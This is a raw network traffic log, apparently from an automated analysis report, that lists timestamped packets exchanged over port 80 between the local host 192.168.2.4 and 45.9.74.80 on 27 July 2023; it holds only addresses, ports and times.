Jul 27, 2023 20:18:59.683655977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703130007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703183889 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703222990 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703263044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703304052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703336000 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703356981 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703383923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703416109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703447104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703460932 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703485966 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703514099 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703547955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703586102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703622103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703655958 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703680038 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703706980 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703742981 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703780890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703824043 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703834057 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703865051 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.703890085 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703927040 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.703980923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704018116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704034090 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704067945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704090118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704127073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704164028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704200983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704216003 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704246998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704293013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704333067 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704394102 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704430103 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704444885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704477072 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704494953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704534054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704580069 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704612970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704626083 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704652071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704672098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704700947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704731941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704765081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704792976 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704813004 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704835892 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704860926 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704874039 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704901934 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704914093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704936028 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.704960108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.704994917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705009937 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705046892 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705055952 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705089092 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705101967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705132961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705153942 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705173969 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705187082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705224037 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705256939 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705292940 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705326080 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705341101 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705374002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705384970 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705420971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705430984 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705457926 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705481052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705518007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705528021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705554008 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705565929 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705602884 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705612898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705638885 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705658913 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705688000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705698967 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705724955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705748081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705785036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705794096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705821037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705846071 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705882072 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705892086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705915928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705933094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705955982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.705966949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.705990076 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706012011 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706046104 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706059933 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706089020 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706106901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706137896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706151962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706177950 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706198931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706229925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706242085 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706265926 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706285000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706322908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706332922 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706357002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706379890 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706409931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706420898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706449032 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706464052 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706492901 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706520081 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706532955 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706558943 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706571102 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706600904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706609011 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706635952 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706645966 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706671953 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706693888 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706712961 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706738949 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706754923 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706773996 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706796885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706826925 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706851006 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706866026 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706887007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706907988 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706929922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706952095 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.706974983 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.706986904 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707016945 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707035065 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707068920 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707079887 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707112074 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707133055 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707160950 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707170963 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707202911 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707216024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707250118 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707257986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707288980 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707303047 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707331896 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707365036 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707391024 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707413912 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707432985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707461119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707482100 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707514048 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707526922 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707556009 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707568884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707593918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707611084 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707642078 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707672119 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707685947 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707698107 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707725048 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707753897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707771063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707797050 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707808971 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707834959 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707849979 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707884073 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707891941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707920074 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.707933903 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707964897 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.707988977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708000898 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708019972 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708050013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708077908 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708089113 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708120108 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708128929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708154917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708165884 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708194971 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708204031 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708230019 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708240986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708277941 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708291054 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708321095 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708347082 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708365917 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708374977 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708401918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708429098 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708441973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708467007 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708477974 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708507061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708514929 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708544016 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708550930 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708578110 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708587885 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708616018 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708626986 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708650112 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708662033 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708688974 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708705902 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708729982 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708738089 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708769083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708781004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708810091 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708817005 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708848000 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708856106 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708882093 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708893061 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708921909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708933115 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708957911 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.708970070 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.708998919 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709011078 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709041119 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709052086 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709081888 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709089994 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709115982 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709125996 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709153891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709167004 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709188938 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709203005 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709239960 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709249973 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709286928 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709296942 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709326029 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709350109 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709384918 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709398985 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709429979 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709444046 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709481955 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709490061 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709517002 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709533930 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709569931 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709578037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709604025 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709621906 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709657907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709667921 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709698915 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709717035 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709752083 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709765911 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709794998 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709811926 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709845066 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709856987 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709882021 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709901094 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709934950 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.709948063 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.709981918 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732239008 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732304096 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732338905 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732383013 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732412100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732444048 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732464075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732490063 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732506990 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732585907 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732630968 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732657909 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732688904 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732705116 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732733965 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732742071 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732769966 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732783079 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732805014 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732821941 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732851028 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732861996 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732889891 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732901096 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732933044 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.732940912 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732968092 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.732979059 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733009100 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733022928 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733047962 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733061075 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733091116 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733103037 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733129978 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733140945 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733170986 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733181953 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733211994 CEST	80	49693	45.9.74.80	192.168.2.4
Jul 27, 2023 20:18:59.733220100 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733244896 CEST	49693	80	192.168.2.4	45.9.74.80
Jul 27, 2023 20:18:59.733257055 CEST	80	49693	45.9.74.80	192.168.2.4
